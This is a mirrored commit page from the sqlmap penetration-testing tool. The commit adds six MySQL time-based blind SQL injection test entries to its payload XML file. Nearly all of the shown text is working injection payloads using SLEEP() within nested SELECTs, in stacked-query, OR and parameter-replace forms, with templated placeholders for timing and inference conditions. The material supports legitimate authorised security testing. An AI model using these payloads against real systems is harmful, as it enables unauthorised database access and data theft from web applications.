sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-03 13:14:13 +03:00
Code Issues Packages Projects Releases Wiki Activity

ported the recent MySQL time-based payload (introduced with 66c2a79397) to other techniques and conditions

Browse Source
This commit is contained in:
Bernardo Damele 2015-02-18 09:45:44 +00:00
parent 1636088b75
commit c51ecf33f3
1 changed files with 123 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

123
xml/payloads/00_payloads.xml
View File

@ -1641,6 +1641,47 @@ Tag: <test>
<!-- End of inline queries tests --> <!-- End of inline queries tests -->
<!-- Stacked queries tests --> <!-- Stacked queries tests -->
<test>
<title>MySQL &gt; 5.0.11 stacked queries (SELECT)</title>
<stype>4</stype>
<level>2</level>
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.11</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
<stype>5</stype>
<level>4</level>
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.11</dbms_version>
</details>
</test>
<test> <test>
<title>MySQL &gt; 5.0.11 stacked queries</title> <title>MySQL &gt; 5.0.11 stacked queries</title>
<stype>4</stype> <stype>4</stype>
@ -2524,6 +2565,47 @@ Tag: <test>
<!-- End of AND time-based blind tests --> <!-- End of AND time-based blind tests -->
<!-- OR time-based blind tests --> <!-- OR time-based blind tests -->
<test>
<title>MySQL &gt; 5.0.11 OR time-based blind (SELECT)</title>
<stype>5</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3</clause>
<where>2</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.11</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt; 5.0.11 OR time-based blind (SELECT - comment)</title>
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<where>2</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.11</dbms_version>
</details>
</test>
<test> <test>
<title>MySQL &gt; 5.0.11 OR time-based blind</title> <title>MySQL &gt; 5.0.11 OR time-based blind</title>
<stype>5</stype> <stype>5</stype>
@ -2846,6 +2928,47 @@ Tag: <test>
<!-- Time-based tests - After ORDER BY...LIMIT... --> <!-- Time-based tests - After ORDER BY...LIMIT... -->
<!-- Time-based blind tests - Parameter replace --> <!-- Time-based blind tests - Parameter replace -->
<test>
<title>MySQL &gt; 5.0.11 AND time-based blind (SELECT)</title>
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>3</where>
<vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.11</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt; 5.0.11 AND time-based blind (SELECT - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>3</where>
<vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.11</dbms_version>
</details>
</test>
<test> <test>
<title>MySQL &gt;= 5.0 time-based blind - Parameter replace</title> <title>MySQL &gt;= 5.0 time-based blind - Parameter replace</title>
<stype>5</stype> <stype>5</stype>